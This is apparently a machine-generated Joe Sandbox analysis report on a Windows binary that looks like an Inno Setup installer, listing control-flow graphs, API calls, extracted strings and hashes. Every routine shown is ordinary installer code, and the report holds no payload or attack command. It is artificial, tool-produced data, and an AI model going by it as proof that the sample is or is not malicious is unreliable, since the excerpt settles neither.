                                                                                                    • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                    • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1686 468e84 1668->1686 1670 468e94-468eb9 call 42dd4c * 2 1669->1670 1671 468eeb-468ef2 1669->1671 1693 468ebb-468ec4 call 4314f8 1670->1693 1694 468ec9-468edb call 42dd4c 1670->1694 1673 468ef4-468f06 call 42dd4c 1671->1673 1674 468f38-468f3f 1671->1674 1687 468f16-468f28 call 42dd4c 1673->1687 1688 468f08-468f11 call 4314f8 1673->1688 1680 468f41-468f75 call 42dd4c * 3 1674->1680 1681 468f7a-468f90 RegCloseKey 1674->1681 1680->1681 1686->1669 1687->1674 1701 468f2a-468f33 call 4314f8 1687->1701 1688->1687 1693->1694 1694->1671 1704 468edd-468ee6 call 4314f8 1694->1704 1701->1674 1704->1671
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                    Strings
                                                                                                    • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                    • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                    • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                    • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                    • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                    • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                    • %s\%s_is1, xrefs: 00468E05
                                                                                                    • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                    • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                    • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                    • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                    • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                    • API String ID: 47109696-1093091907
                                                                                                    • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                    • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                    • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                    • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                      • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                    • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                    • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                      • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                    • API String ID: 3771764029-544719455
                                                                                                    • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                    • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                    • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                    • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                    • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                    • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                    • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                    • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                    • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                    • String ID: |6B
                                                                                                    • API String ID: 183575631-3009739247
                                                                                                    • Opcode ID: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                                    • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                    • Opcode Fuzzy Hash: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                                    • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(6EA10000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                    • API String ID: 190572456-256906917
                                                                                                    • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                    • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                    • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                    • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                    • API String ID: 3256987805-3653653586
                                                                                                    • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                    • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                    • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                    • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                    APIs
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$Prop
                                                                                                    • String ID: 3A$yA
                                                                                                    • API String ID: 3887896539-3278460822
                                                                                                    • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                    • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                    • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                    • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                                    APIs
                                                                                                    • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                      • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                      • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                    • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                    • String ID: c:\directory$shell32.dll$%H
                                                                                                    • API String ID: 3376378930-166502273
                                                                                                    • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                    • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                                    • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                    • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                    APIs
                                                                                                    • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                    • GetFocus.USER32 ref: 0042F597
                                                                                                    • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                    • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                    • String ID: TWindowDisabler-Window
                                                                                                    • API String ID: 3167913817-1824977358
                                                                                                    • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                    • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                                    • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                    • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                    • API String ID: 1646373207-2130885113
                                                                                                    • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                    • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                                    • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                    • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                                    APIs
                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                    • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                    • API String ID: 4130936913-2943970505
                                                                                                    • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                    • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                                    • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                    • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                                      • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
